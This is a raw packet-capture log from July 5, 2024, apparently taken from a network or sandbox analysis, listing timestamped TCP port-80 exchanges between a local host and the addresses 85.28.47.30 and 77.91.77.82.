                                                                Jul 5, 2024 04:23:15.394607067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394659996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.480870962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.480892897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.480904102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.480925083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.480951071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481021881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481034040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481045008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481055975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481071949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481152058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481163025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481185913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481195927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481213093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481221914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481232882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481235027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481242895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481256962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481271982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481297016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481327057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481338024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481349945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481363058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481372118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481375933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481388092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481394053 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481426954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.481455088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481466055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.481513023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.488770008 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.489054918 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.495201111 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.495263100 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.495354891 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.495409012 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.495503902 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.500235081 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.558729887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558739901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558752060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558773994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558794975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558809996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558823109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558834076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558845043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558851004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558862925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558871031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558873892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558898926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558901072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558913946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558926105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558927059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558948040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558953047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558967113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558980942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.558984041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.558996916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.559007883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.559017897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.559036016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.559056997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562077999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562087059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562093019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562129974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562154055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562161922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562165976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562180996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562187910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562191963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562218904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562226057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562238932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562256098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562263966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562271118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562288046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562290907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562302113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562310934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562328100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562339067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562366962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562377930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562387943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562398911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562410116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562412024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562438965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562450886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562473059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562483072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562493086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562513113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562515020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562524080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562536955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562536955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562550068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562561989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562566042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562588930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562602997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562611103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562623024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562654018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562663078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562664986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562678099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562696934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562721014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562732935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562748909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562760115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562767029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562786102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562812090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562815905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562834978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562845945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562859058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562870026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.562875986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.562902927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.641129017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.641158104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.641177893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.641191006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.641201973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.641202927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.641244888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650726080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650737047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650748014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650779009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650790930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650803089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650810003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650820971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650830984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650846958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650850058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650861025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650916100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650942087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650953054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650963068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650973082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650984049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.650985003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.650993109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.651000977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.651030064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.651036978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.651047945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.651101112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661659956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661670923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661681890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661706924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661744118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661806107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661818981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661829948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661839962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661844015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661853075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661860943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661865950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.661885023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.661900043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.663038015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.663059950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.663090944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.663111925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672621965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672666073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672696114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672705889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672735929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672749043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672758102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672795057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672837019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672849894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672859907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672874928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672887087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672899961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.672911882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.672950983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673007965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673018932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673029900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673057079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673072100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673083067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673094034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673115015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673120022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673125029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673136950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673145056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673162937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673191071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673217058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673228025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673238993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673254013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673265934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673419952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673430920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673440933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673451900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673456907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673475027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673497915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673510075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673521042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673530102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673541069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673548937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673553944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673568010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673614025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673646927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673657894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673671007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673681974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673691988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673696995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673702002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673715115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673727036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673737049 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673742056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673904896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673917055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673926115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673937082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673943996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673948050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673954010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.673959970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673971891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.673978090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674005032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674038887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674050093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674060106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674079895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674091101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674263954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674273968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674283028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674293995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674300909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674305916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674313068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674316883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674331903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674339056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674343109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674354076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674359083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674365044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674379110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674381971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674397945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674411058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.674451113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.674489021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681308985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681329966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681340933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681360006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681361914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681371927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681376934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681384087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681404114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681425095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681503057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681529999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681540012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681540966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681566954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681592941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681617022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681627989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681638956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681649923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681655884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681664944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681687117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681689024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681701899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681714058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.681730986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.681752920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723689079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723700047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723711014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723752975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723753929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723764896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723777056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723787069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723792076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723799944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723814964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723831892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723834038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723843098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.723867893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.723890066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746072054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746114016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746124983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746146917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746170998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746184111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746196032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746229887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746252060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746260881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746305943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746335983 CEST804973285.28.47.30192.168.2.4
